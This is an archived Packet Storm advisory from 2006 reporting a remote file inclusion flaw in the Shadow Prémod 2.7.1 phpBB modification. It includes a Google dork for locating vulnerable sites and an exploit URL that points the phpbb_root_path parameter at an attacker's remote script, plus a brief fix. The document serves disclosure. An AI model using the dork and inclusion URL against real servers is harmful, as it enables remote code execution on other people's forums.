phpBBShadow.txt

2006-09-07T00:00:00
ID PACKETSTORM:49724
Type packetstorm
Reporter Kw3rLN
Modified 2006-09-07T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------  
Shadow Prémod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability  
---------------------------------------------------------------------------  
  
  
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :  
Remote : Yes  
Critical Level : Dangerous  
Google d0rk: "Dernière version de la Prémod Shadow sur phpBB.biz"  
---------------------------------------------------------------------------  
  
Affected software description :  
~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : Shadow Prémod  
version : 2.7.1  
URL : http://premod-shadow.info  
------------------------------------------------------------------  
  
  
Exploit:  
~~~~~  
Variable $phpbb_root_path not sanitized.When register_globals=on an attacker ca  
n exploit this vulnerability with a simple php injection script.  
  
# http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evi  
l_Script]  
---------------------------------------------------------------------------  
  
Solution :  
~~~~~~~  
declare variabel $phpbb_root_path  
---------------------------------------------------------------------------  
  
  
Shoutz:  
~~~  
  
# Special greetz to my good friend [Oo]  
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]  
---------------------------------------------------------------------------  
  
*/  
  
Contact:  
~~~~~  
  
Nick: Kw3rLn  
E-mail: ciriboflacs[at]YaHoo[dot]Com  
Homepage: hTTp://RST-CREW.NET  
_/*  
  
-------------------------------- [ EOF] ----------------------------------  
  
  
`